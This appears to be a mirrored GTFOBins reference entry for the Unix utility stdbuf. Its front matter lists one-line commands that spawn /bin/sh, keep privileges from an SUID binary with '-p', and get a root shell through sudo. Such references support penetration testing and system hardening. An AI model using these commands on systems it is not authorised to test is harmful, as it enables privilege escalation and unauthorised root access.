mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
10 lines
147 B
Markdown
10 lines
147 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: stdbuf -i0 /bin/sh
|
|
suid:
|
|
- code: ./stdbuf -i0 /bin/sh -p
|
|
sudo:
|
|
- code: sudo stdbuf -i0 /bin/sh
|
|
---
|